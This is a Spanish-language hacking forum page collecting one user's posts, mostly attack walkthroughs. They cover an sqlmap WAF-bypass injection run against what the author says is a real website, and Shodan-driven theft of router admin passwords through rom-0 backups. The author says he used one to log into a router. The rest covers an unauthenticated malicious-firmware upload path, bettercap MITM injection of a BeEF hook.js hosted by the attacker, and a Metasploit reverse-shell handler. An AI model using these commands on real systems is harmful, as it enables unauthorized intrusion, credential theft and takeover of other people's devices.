Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Lonewolf

#1
bettercap :3 .... si quieres pasate por uno de mis ultimos post donde hablo lo basico de el.
#2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Super útil me lo añado a favoritos.

Desconocía lo de los tampers por completo !! A veces una busca en --help lo que le interesa y se le pasan cosas muy útiles.

Tengo una duda: Si alguien tiene una SQLi típica, estilo id=1' OR '1'='1 y no tiene ningún WAF activado pero usas un tamper, sqlmap será capaz de encontrar la inyección, o al pasar la cadena difente el servidor interpretará mal el parámetro y por tanto no detectará la SQLi?
Hola Luciernaga ,  respondiendo tu pregunta sqlmap va a ejecutar correctamente la inyeccion tenga o no waf activado ya que las bases de datos son capazes de interpretar los parametros ofuscados :)
#3
Hola en esta entrada vamos a ver como bypassear el WAF (Web Application Firewall) con la herramienta sqlmap y sus tampers .
Que es un Tamper ?
-Un tamper es un script compatible con sqlmap cuya funcion es simplemente camuflar los payloads para asi burlar los sistemas de proteccion de los cortafuegos que traen las bases de datos .

Que tampers tenemos disponibles por defecto en sqlmap ?
-Tenemos una gran cantidad de tampers para burlar distintas soluciones de seguridad . La ubicacion de los tampers es :
En el caso de tenerlo instalado :  /usr/share/sqlmap/tamper
Si lo clonaron desde github es : /sqlmap/tamper

Funcion de los tampers mas utilizados :
space2comment.py = Sustituye un carácter de espacio >>  " ( ' ') ", con inserciones ' / ** /'
charencode.py = Codifica todos los caracteres con numérico   44%20%54%20%
base64encode.py = Convierte todo los caracteres en codificación base64 'MScgQU5EIFNMRUVQKDUpIw=='
randomcomments.py = Añade comentarios al azar mediante búsquedas de palabras MySQL 'I/**/N/**/SERT'
Los invito a averiguar las funciones de los demas tampers por sus propios medios .
Bueno , dicho esto vamos al ataque  ;D ;D ;D
Voy a dar por hecho que sabran lo que es una sqli como explotarlas y mas aun con sqlmap  :-\
Una vez con nuestro sitio vulnerable en pantalla y su tipico error de bases de datos vamos a comenzar con la inyeccion .

Ahora abrimos el terminal y lanzamos el ataque de la siguiente forma : sqlmap -u pagina.php?id=1 --random-agent --tamper=space2comment -v 3 --dbs .
En este caso estamos frente a una db MySql assi que vamos a utilizae el tamper "space2comment" ya que es uno de los tampers mas funcionales en dichas bases de datos .

Muy bien , la herramienta nos confirma que estamos frente a  MySql asi que vamos a proceder con el ataque

Perfecto !!! logramos vulnerar el parametro id esto significa que el tamper ofusco correctamente los payloads . ahora vamos a solicitar las bases de datos .

Bueno esta es una pagina de la biblia asi que creo que es lo mas cerca que podemos estar de "Hackear" a dios ?) jaja
asi concluye el post de hoy , a continuacion se muestran los tampers disponibles y con que database son compatibles  ;)
MySQL
space2randomblank,
unionalltounion
unmagicquotes
versionedkeywords
versionedmorekeywords
xforwardedforbetween
bluecoat
charencode
charunicodeencode
concat2concatws
equaltolike
greatest
halfversionedmorekeywords
ifnull2ifisnull
space2morehash
space2mysqldash
space2plus
modsecurityversioned
modsecurityzeroversioned
multiplespaces
securesphere
space2comment
space2hash
nonrecursivereplacement
percentage
randomcase
MSSQL:
sp_password
space2comment
space2dash
space2mssqlblank
space2mysqldash
space2plus
space2randomblank
charencode
charunicodeencode
equaltolike
greatest
unionalltounion
unmagicquotes
multiplespaces
nonrecursivereplacement
percentage
randomcase
securesphere
MSAccess:
modsecurityversioned
modsecurityzeroversioned
equaltolike
greatest
halfversionedmorekeywords
nonrecursivereplacement
percentage
randomcase
securesphere
between
bluecoat
charencode
charunicodeencode
concat2concatws
space2comment
space2hash
space2morehash
space2mysqldash
space2plus
space2randomblank
unionalltounion
unmagicquotes
versionedkeywords
versionedmorekeywords
ifnull2ifisnull
multiplespaces
PostgreSQL:
xforwardedfor
space2comment
space2plus
space2randomblank
between
charencode
charunicodeencode
equaltolike
greatest
multiplespaces
nonrecursivereplacement
percentage
randomcase
securesphere
between


SQLite:
space2plus
unionalltounion
unmagicquotes
xforwardedfor
ifnull2ifisnull
randomcase
securesphere
space2comment
space2dashmmultiplespaces
nonrecursivereplacement

Conceptos : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


#4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Man una pregunta, seguiste algun tutorial en especifico para instalr bettercap y beef?
Hola ceromee si , en internet hay varios , primeramente tenes que instalar ruby on rails = sudo apt-get install build-essential ruby-dev libpcap-dev

segundo para instalar bettercap solamente tienes que ejecutar el comando = gem install bettercap ,obiamente despues de tener ruby

y por ulltimo para instalar beef te recomiendo seguir la guia de instalacion en su pagina de github No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#5
Hola , en este post voy a explicarles 2 formas de explotar la vulnerabilidad en una version de firmeware que esta corriendo en miles de routers actualmente . dicha vulnerabilidad es conocida aproximadamente desde el año 2012 y creo que no se le esta dando demaciada importancia ...
Comenzemos :
Primeramente vamos a hacer una simple busqueda en shodan especificando la version de firmeware vulnerable :

como vemos hay demaciados routers para entretenernos por un tiempo .
Primero vamos a exponer la vulnerabilidad que a mi parecer es mas critica ya que es demaciado facil explotarla , esta consiste en que es posible para cualquier atacante obtener una copia de seguridad de el router , dicha copia va a contener la contraseña de acceso a dicho router .lo que debemos hacer es colocar luego de la ip de el router "rom-0" y se nos descargaria autometicamente la copia de seguridad de el mismo , vamos al ataque .
http://ipvulnerable/ :

como vemos no topamos con el panel de administracion de dicho router . ahora que pasa si colocamos rom-0 delante de la ip ?
http://ipvulnerable/rom-0

Perfecto , se nos descargo la copia de seguridad . ahora denemos que descomprimirla , para eso les recomiendo ir a la siguiente pagina : "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" ;
vamos a darle click en "select archive" , seleccionamos el archivo descargado , completamos en capcha y damos click en "unpack rom-0" .

Perfecto tenemos la contraseña de administrador , en este caso es "admin" osea la contraseña por defecto pero en el caso de que el user lo aya cambiado de todas formas obtendremos la clave . ahora vamos a ingresar a el admin panel .

Perfecto , el router es nuestro !!! obiamente la ip a la que ingrese y la ip de la que saque captura de las credenciales son distintas para que ningun usuario malintencionado haga macanas XD
Bueno ahora vamos a la segunda vulnerabilidad :
esta consiste en que el router nos va a permitir cargarle un firewall a router si pedirnos ninguna credencial ,esto podria utilizarse para subir malware en los routers de tal forma que un "sombrero negro" podria tener el control de el trafico , interceptar datos , tomar el router como parte de su botnet, etc, etc, etc....
Lo que tenemos que hacer es colocar la ip seguido de "rpFWUpload.html"
http://ipvictima/rpFWUpload.html
Asi se veria :

Lo unico que hay que hacer es subir el firmeware malicioso y listo .

La verdad es que esto da bastante que pensar ya que esta vulnerabilidad podria estar ahi mas que por un simple error de programacion , ustedes saquen sus propias conclusiones .
Bueno asta aca llego el aporte asta la proxima entrada .
#6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Todavia no pude infectar mi propio celular con el bettercap del otro post. Esta bien configurado todo, es como que mi celular se queda sin internet, no logra conectar a las paginas. Por ende no lo puedo infectar, porque no logra conectar al hook del beef.
Si entro directamente si, pero eso es otro tema.
Hoy cuando llego a casa, pruebo hacer lo del meterpreter nuevamente, viste que podes integrar todo el metasploit en el beef no? - Y creo que tambien el armitage/cobalt strike-
Hola Pakachu , no le he probado con cobalt strike pero vi en algun post perdido por ahi que si se puede jaja , y por lo general si se puede con metasploit tambiense podra con armitage ya que solo es un entorno grafico para dicho framework , lo que me dices sobre tu problema con tu android si es que estas haciendo todo correctamente se me ocurren 2 posibles causas :
1- Si entras a alguna pagina con HSTS (https) podria que dicho protocolo no te deje interceptar el trafico e inyectar el hook.js , para solucionarlo podrias probar con una pagina http como con la que probe en el post .
2- Existe la probabilidad se que el ancho de banda de tu pc este un poco sobrecargado y por eso podria ser que el celular no te este dando internet correctamente , podrias probar si bettercap finciona simplemente con "bettercap -T ipvictima --proxy" la verdad que no se me ocurre nada mas , saludos
#7
Hola, en la entrada de hoy continuaremos con la entrada enterior en la que les prometi que obtendriamos nuestra estupida y sensual sesion de meterpreter , para que entiendan mejor les recomiendo leer la entrada anterior : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Bueno , en este caso vamos a obtener nuestra shell mediande un payload para java que BeEF trae en sus opciones de post-explotación que cabe recalcar que no son pocas  :o .

En la entrada anterior habíamos logrado infectar un navegador de un dispositivo android , en este caso el navegador infectado estara corriendonen una maquina con Maicrosó Guindous 7 ( Windows 7 ... lo se mis chistes son malos, no me dejen  :'( ) . Pero no se asusten el procedimiento de infección es exactamente el mismo.
Comenzemos desde un punto en el que tenemos un navegador infectado con BeEF:




Ok, veamos que podemos hacer.




Antes de seguir tenemos que entender que significan los puntos de colores que tenemos adjuntados a cada opcion:

  • Verde: El objetivo es vulnerable y el ataque no sera persivido por la victima.
  • Naranja: El objetivo es vulnerable pero su ejecución sera advertida por el usuario.
  • Gris: No esta comprobado que la victima sea vulnerable.
  • Rojo: La victima no es vulnerable.



Para ejecutar El modulo solo es nesesario darle click y configurar los parametros que tendremos en la parte derecha de la ventana.
Luego de configurar nuestro payload en BeEF vamos a abrir una nueva terminal , vamos a ejecutar metasploit y poner un handler en escucha:


  • Iniciar metasploit: "msfconsole"
  • Seleccionar nuestro exploit: "use exploit/multi/handler"
  • Configurar nuestro Payload: "set PAYLOAD java/meterpreter/reverse_tcp"
  • Colocar nuestra ip en escucha: "set LHOST 192.168.0.104 (esto puede variar según cada caso)"
  • Colocar un puerto en escucha: "set LPORT 6666" Pueden usar cualquier puerto que no este en uso.



Obiamente tenemos que colocar los mismos datos que con los que configuramos el modulo java en BeEF




Ahora colocamos el handler en escucha con el comando "exploit" o "run"




Seguidamente por el lado de BeEF lanzamos el modulo que teniamos configurado y tendriamos que obtener nuestra estupida y sensual sesión de meterpreter .




Me despido hasta la proxima entrada.



Fuente: "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"



#8
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
muy interesante man, lo que no veo en la imagen es el javascript malicioso que dices que inyecta!! igual voy a probarlo, muchas gracias por tu aporte!
Gracias por el comentario ceroMee !!! , fijate en la parte baja de la imajen donde dice [INJECTJS] eso seria parte de el proceso , no pude colocar todo el proceso ya que serian muchas imagenes jaja
#9
Hola a todos, en esta entrada vamos a aprender como infectar navegadores con codigo javascript  :)
Primero un poco de teoria.

¿Que es BeEF?
Basicamente BeEF es un framework diseñado para la explotacion de navegadores atravez de codigo javascript , dicho framework tiene una grandisima cantidad de opciones de post-explotacion que vamos a ver en profundidad en las siguientes entradas .


¿Que es Bettercap ?
Bettercap es un framework para ataques MITM (man in the middle) completo y modular que surgió con el objetivo de brindarnos una herramienta mas completa y estable que ettercap.

Ahora pasemos a la parte divertida ;)


Primero vamos a abrir un terminal y vamos a correr beef con el siguiente comando:
Código: php
beef-xss




Luego de lanzar este comando automaticamente se nos tendria que abrir una ventana del navegador asi:




En el caso de que el navegador no se abra lo abrimos nosotros y colocamos la siguiente direccion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El usuario y contraseña por efecto son:

user: beef
pass: beef




Ok, por ahora dejariamos beef asi, pasemos a Bettercap:

Abrimos otra terminal en la que lanzaremos bettercap indicandole nuestro target (objetivo) , el modulo que vamos a utilizar y la ruta del javascript malicioso proporcionado por beef con el siguiente comando:
Código: php
bettercap -T 192.168.0.101 --proxy-module injectjs --js-url "http://192.168.0.104:3000/hook.js"




Luego tendriamos que ver lo siguiente:




ahora vamos a ver como bettercap inyecta el codigo javascript que le indicamos en las peticiones de nuestra victima  8)




Muy bien como vemos nuestra victima ingreso a la pagina No tienes permitido ver los links. Registrarse o Entrar a mi cuenta desde su android , ( en este caso la maquina victima es un smartphone pero el ataque es igualmente eficaz en cualquier tipo de dispositivo o so ) y la herramienta automaticamente inyecto el codigo javascript .
Bien ahora veamos que pasa por el lado de nuestro querido beef:




Perfecto!!! veamos la informacion de el navegador victima.




Muy bien asta aca llego este post , esten atentos a nuevas entradas ya que aprenderemos a obtener una sesion de meterpreter mediante esta gran herramienta .